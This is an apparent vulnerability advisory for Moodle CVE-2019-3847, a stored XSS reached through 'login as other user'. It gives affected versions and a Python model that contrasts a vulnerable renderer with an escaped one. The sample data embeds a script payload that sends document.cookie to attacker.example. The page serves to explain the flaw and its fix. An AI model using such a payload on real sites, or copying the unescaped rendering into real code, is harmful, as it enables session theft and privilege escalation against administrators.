JavaScript Injection Vulnerability in Moodle Rendered via the 'Login as other user' Feature
CVE-2019-3847
What is CVE-2019-3847?
Moodle versions prior to 3.6.3, 3.5.5, 3.4.8 and 3.1.17 did not escape JavaScript that a user had included in their own Dashboard when that Dashboard was viewed through the 'login as other user' feature. A user who can place script in their Dashboard content can therefore have it rendered unescaped in the browser session of whoever logs in as them. Because the capability to log in as other users is normally held by administrators and managers, the injected script runs with that privileged user's session, so the flaw behaves as a stored cross-site scripting (XSS) issue whose impact is bounded by the privileges of the viewer rather than of the author. Sites where administrators or managers routinely use 'login as' to inspect user accounts are the ones most exposed.
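The rendering gap described above, shown as an added illustration that is not Moodle's code: a simplified Python model of a Dashboard with user-editable block titles, a vulnerable renderer that concatenates those titles straight into HTML, the escaped renderer that closes the hole, and a 'login as' helper that makes explicit that the target user's markup is delivered to the privileged viewer's browser. The user names, roles, block structure, the LOGIN_AS_ROLES capability check and the script payload are all constructed assumptions for the example.

```python
import html
from typing import Callable, Dict

# Constructed sample data (hypothetical, not Moodle's data model): each user
# owns a Dashboard made of blocks whose titles they can edit freely.
USERS: Dict[str, dict] = {
    "student": {
        "role": "student",
        "blocks": [
            {"title": "My links"},
            # Attacker-controlled title carrying a script payload (constructed).
            {"title": "Notes<script>document.location='https://attacker.example/?c='"
                      "+document.cookie</script>"},
        ],
    },
    "manager": {"role": "manager", "blocks": [{"title": "Site statistics"}]},
}

# Assumed capability model: only these roles may use "login as other user".
LOGIN_AS_ROLES = {"manager", "admin"}


def render_dashboard_vulnerable(username: str) -> str:
    """Vulnerable rendering: block titles are concatenated into markup as-is,
    so any <script> saved by the Dashboard's owner survives into the page."""
    return "".join(f"<h2>{b['title']}</h2>" for b in USERS[username]["blocks"])


def render_dashboard_fixed(username: str) -> str:
    """Fixed rendering: every user-supplied string is HTML-escaped at output
    time, regardless of who is viewing it."""
    return "".join(
        f"<h2>{html.escape(b['title'], quote=True)}</h2>"
        for b in USERS[username]["blocks"]
    )


def login_as(viewer: str, target: str, render: Callable[[str], str]) -> str:
    """Simulate 'login as other user': the viewer's browser receives the
    target's Dashboard, so anything executable in that markup runs in the
    viewer's (privileged) session, not the target's."""
    if USERS[viewer]["role"] not in LOGIN_AS_ROLES:
        raise PermissionError(f"{viewer} may not log in as other users")
    return render(target)


def has_live_script(markup: str) -> bool:
    """Crude detector, used here only to contrast the two renderers: a raw
    <script tag survived into the delivered page."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    bad = login_as("manager", "student", render_dashboard_vulnerable)
    good = login_as("manager", "student", render_dashboard_fixed)
    print("vulnerable renderer delivers live script:", has_live_script(bad))   # True
    print("fixed renderer delivers live script:     ", has_live_script(good))  # False
```

The design point is that the escape call belongs in the output path, not in a check on the viewer: the vulnerable renderer is equally wrong whether the student or the manager is looking at the page, but only the 'login as' path puts a privileged session in front of attacker-controlled markup, which is what turns an ordinary stored XSS into a privilege-escalation issue.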
Affected Version(s)
Moodle 3.6 to 3.6.2
Moodle 3.5 to 3.5.4
Moodle 3.4 to 3.4.7
Moodle 3.1 to 3.1.16
Exploit Proof of Concept (PoC)
No PoC for this CVE is reproduced on this page. PoC code is written by security researchers to demonstrate that a vulnerability can be exploited; it is also a building block for weaponisation, so the public availability of a PoC should raise the priority of applying the fixed Moodle releases listed above.